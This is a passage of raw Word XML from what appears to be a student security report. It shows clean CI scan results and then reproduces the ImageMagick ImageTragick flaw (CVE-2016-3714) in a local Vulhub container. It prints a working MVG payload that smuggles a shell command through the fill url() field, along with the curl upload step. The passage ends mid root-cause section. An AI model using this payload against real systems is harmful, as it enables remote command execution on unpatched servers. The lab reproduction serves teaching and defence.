          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reports/ (requires SNYK_TOKEN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>actions/upload-artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>security-reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>The most recent successful run is available at the pipeline link on the title page. The main job completed in about 35 seconds; the Snyk job runs as a separate job so that an unavailable SCA service cannot block the test/SAST/SCA pipeline. In the successful run, Snyk tested 9 dependencies for known issues and reported 0 issues and 0 vulnerable paths; snyk.json and snyk-report.html were uploaded as the snyk-report artifact. The run page and the scanner summaries are shown below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5220000" cy="4847143"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="04-ci-pipeline.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220000" cy="4847143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 1 - GitHub Actions run page: successful pipeline with the SAST/SCA job and artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>3.1  Scan results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Both scanners were also executed locally to show their summaries in the same environment used for the experiments. bandit reports zero issues at every severity level, and safety reports no known vulnerabilities for the pinned dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4860000" cy="2540343"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05-sast-sca.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860000" cy="2540343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2 - SAST and SCA summaries: bandit 0 findings; safety reports no known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.  Real CVE: CVE-2016-3714 (ImageMagick ImageTragick)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.1  Summary</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val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2016-3714 (ImageTragick)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ImageMagick image processing library</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Affected versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ImageMagick before 6.9.3-10; 7.x before 7.0.1-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerable environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>vulhub/imagemagick:6.9.2-10-php (Vulhub imagemagick/CVE-2016-3714)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attack type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Remote command execution through shell metacharacters in a crafted image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS 2.0: 10.0; CVSS 3.1: 8.4 (NVD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entry point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PHP upload page on http://127.0.0.1:8080/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CWE-20: improper input validation / command injection in delegate construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>CVE-2016-3714 was checked against the class CVE allocation list and is not assigned to another student.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.2  Vulnerable environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The vulnerable environment is the official Vulhub example. It runs ImageMagick 6.9.2-10 behind a PHP upload page, which calls the identify command on the uploaded temporary file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>wsl -d Ubuntu-22.04</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd /home/EggplantPig/vulhub/imagemagick/CVE-2016-3714</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl http://127.0.0.1:8080/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.3  Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The crafted image is an MVG file. The fill primitive uses a URL containing a double quote and a pipe. The double quote closes the URL before the delegate's closing quote, and the pipe appends an arbitrary command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>push graphic-context</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>viewbox 0 0 640 480</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>fill 'url(https://127.0.0.1/oops.jpg"|touch /tmp/success")'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>pop graphic-context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The file is uploaded to the PHP page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@1.gif;filename=1.gif;type=image/gif"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Evidence: the injected command created a file in the container</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose exec -T web ls -l /tmp/success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The HTTP response is still 200 and reports the image size as 640 x 480. The command execution happens inside the ImageMagick delegate, so the application itself appears to have processed an image successfully. The marker file /tmp/success is created with owner root, which proves arbitrary command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2634430"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="01-vulnerable-attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2634430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 3 - Vulnerable environment: the crafted MVG upload creates /tmp/success inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.4  Root cause analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ImageMagick selects a coder based on the file content. For the MVG format, the fill 'url(...)' primitive is handled by an external delegate. In the vulnerable version the delegate command template is similar to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
